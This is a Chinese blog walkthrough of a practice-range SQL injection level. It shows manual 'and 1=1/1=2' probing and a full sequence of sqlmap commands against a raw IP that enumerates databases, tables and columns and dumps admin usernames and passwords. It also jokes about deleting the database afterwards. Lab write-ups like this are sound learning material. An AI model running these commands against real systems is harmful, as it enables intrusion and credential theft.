记录一次sqlmap渗透封神台靶场第一节

作者 : 佰颜 本文共637个字,预计阅读时间需要2分钟 发布时间: 2020-08-24 共23人阅读

边学习 边做题 学了不用 等于白学

先访问网址 http://59.63.200.79:8003/?id=1

先手工测下 and 1=1   |   and 1=2

1598259800-4178e328f841ce2

成功报错 ,说明有注入漏洞 ,拿出SQL马屁  因为我是脚本小子  哈哈哈

1598260227-1cab9c78d9a517f

sqlmap的版本 然后检测是否有注入点  已经检测过了 所以直接爆出所有数据库

sqlmap -u http://59.63.200.79:8003/?id=1  –dbs    也看不懂啥意思 一路回车就对了

1598260446-7223e9ff2158bb5

然后拿到了三个数据库 但是只有maoshe这个对咋们有用所以接着爆这个

sqlmap -u http://59.63.200.79:8003/?id=1  -D maoshe –tables  注意大写 一个- 跟两个–

1598260652-41f8e41ef671a9c

拿到了这些  数据在admin  管理员嘛  接着爆这这个

sqlmap -u http://59.63.200.79:8003/?id=1  -D maoshe -T admin –columns

1598260793-8c4314ab374e2e9

拿到了表明  接下来直接爆破字段 爆破 密码跟账号就行  就是password跟username

sqlmap -u http://59.63.200.79:8003/?id=1  -D maoshe -T admin -C username,password –dump

1598260975-e633dded555a933

这样就完整爆出 来了 需要的就是这个 hellohack  下面是彩蛋。。。。

结束了

小技巧  每个大写字母 其实就是 后面的那个的首写字母    –  D  -T  -C

对应的–dbs   –tables   –columns   不知道这样理解对不对

完事  跑路  删库

因为游客付款订单金额过低的原因所有低于3M的压缩包全部按3M计算也就是支付宝支付的0.01元
疯狂资源站 » 记录一次sqlmap渗透封神台靶场第一节

常见问题FAQ

资源的下载速度怎么样?
所有资源均存储于阿里云oss全球极速下载!
资源包安装吗?
本站仅仅提供下载服务,如需安装另付费!
资源损坏不完整等等怎么办?
资源均来自互联网,仅收集并提供极速下载!

发表评论